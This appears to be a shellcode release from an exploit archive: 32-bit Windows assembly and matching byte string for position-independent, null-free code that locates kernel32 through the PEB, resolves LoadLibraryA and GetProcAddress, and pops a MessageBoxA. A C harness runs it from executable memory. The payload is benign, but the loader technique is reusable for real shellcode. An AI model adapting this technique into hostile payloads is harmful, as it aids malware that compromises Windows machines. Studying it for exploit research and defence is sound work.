167 bytes small all Windows null-free MessageBoxA shellcode. Tested on 2000, XP, XP x64, Vista, 7, 8 M3 x64.
437fa45db69d2822c191ab5303e89feba74d2a148268c980c7da10a151e0f896
/*
;------------------------------------------------------------------------
;Title...................All Windows Null-free MessageBoxA Shellcode
;........................167 Bytes
;Release Date............7/11/2011
;Tested On...............Windows 2000, Windows XP, Windows XP x64,
;........................Windows Vista, Windows 7, Windows 8 M3 x64
;------------------------------------------------------------------------
;Author..................John Leitch
;Site....................http://www.autosectools.com/
;Email...................john@autosectools.com
;------------------------------------------------------------------------
bits 32
xor ebx, ebx
jmp short start
;================================
;Find Function
;================================
find_function:
;================================
;Find Kernel32 Base
;================================
mov edi, [fs:ebx+0x30]
mov edi, [edi+0x0c]
mov edi, [edi+0x1c]
module_loop:
mov eax, [edi+0x08]
mov esi, [edi+0x20]
mov edi, [edi]
cmp byte [esi+0x0C], '3'
jne module_loop
;================================
;Kernel32 PE Header
;================================
mov edi, eax
add edi, [eax+0x3c]
;================================
; Export directory table
;================================
;0x00 Export Flags
;0x04 Time/Date Stamp
;0x08 Major Version
;0x0A Minor Version
;0x0C Name RVA
;0x10 Ordinal Base
;0x14 Address Table Entries
;0x18 Number Of Names
;0x1c Address Table RVA
;0x20 Name Pointer Table RVA
;0x24 Ordinal Table RVA
;================================
;================================
;Kernel32 Export Directory Table
;================================
mov edx, [edi+0x78]
add edx, eax
;================================
;Kernel32 Name Pointers
;================================
mov edi, [edx+0x20]
add edi, eax
;================================
;Find LoadLibraryA
;================================
mov ebp, ebx
name_loop:
mov esi, [edi+ebp*0x4]
add esi, eax
inc ebp
mov ecx, [esp+0x4]
cmp dword [esi], ecx
jne name_loop
mov ecx, [esp+0x8]
cmp dword [esi+0x4], ecx
jne name_loop
;================================
;LoadLibraryA Ordinal
;================================
mov edi, [edx+0x24]
add edi, eax
mov bp, [edi+ebp*0x2]
;================================
;LoadLibraryA Address
;================================
mov edi, [edx+0x1C]
add edi, eax
mov edi, [edi+(ebp-0x1)*0x4] ;subtract ordinal base
add eax, edi
ret
start:
;================================
;Call LoadLibraryA
;================================
push 0x7262694C ;Libr
push 0x64616F4C ;Load
call find_function
xor ecx, ecx
mov cx, 0x3233 ;32
push ecx
push 0x72657375 ;user
push esp ; lpFileName
call eax
push eax
;================================
;Call GetProcAddress
;================================
push 0x41636F72 ;rocA
push 0x50746547 ;GetP
call find_function
pop ecx
pop ecx
pop ecx
push 0x041786F0; oxA
shr dword [esp], 0x4
push 0x42656761; ageB
push 0x7373654D; Mess
push esp ; lpProcName
push ecx ; hModule
call eax
;================================
;Call MessageBoxA
;================================
push ebx
push ebx
push ebx
push ebx
call eax
*/
#include <stdio.h>
#include <windows.h>
using namespace std;
int main()
{
char* shellcode =
"\x31\xdb\xeb\x55\x64\x8b\x7b\x30"
"\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47"
"\x08\x8b\x77\x20\x8b\x3f\x80\x7e"
"\x0c\x33\x75\xf2\x89\xc7\x03\x78"
"\x3c\x8b\x57\x78\x01\xc2\x8b\x7a"
"\x20\x01\xc7\x89\xdd\x8b\x34\xaf"
"\x01\xc6\x45\x8b\x4c\x24\x04\x39"
"\x0e\x75\xf2\x8b\x4c\x24\x08\x39"
"\x4e\x04\x75\xe9\x8b\x7a\x24\x01"
"\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c"
"\x01\xc7\x8b\x7c\xaf\xfc\x01\xf8"
"\xc3\x68\x4c\x69\x62\x72\x68\x4c"
"\x6f\x61\x64\xe8\x9c\xff\xff\xff"
"\x31\xc9\x66\xb9\x33\x32\x51\x68"
"\x75\x73\x65\x72\x54\xff\xd0\x50"
"\x68\x72\x6f\x63\x41\x68\x47\x65"
"\x74\x50\xe8\x7d\xff\xff\xff\x59"
"\x59\x59\x68\xf0\x86\x17\x04\xc1"
"\x2c\x24\x04\x68\x61\x67\x65\x42"
"\x68\x4d\x65\x73\x73\x54\x51\xff"
"\xd0\x53\x53\x53\x53\xff\xd0";
printf("shellcode length: %i", strlen(shellcode));
LPVOID lpAlloc = VirtualAlloc(0, 4096, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(lpAlloc, shellcode, strlen(shellcode));
((void(*)())lpAlloc)();
return 0;
}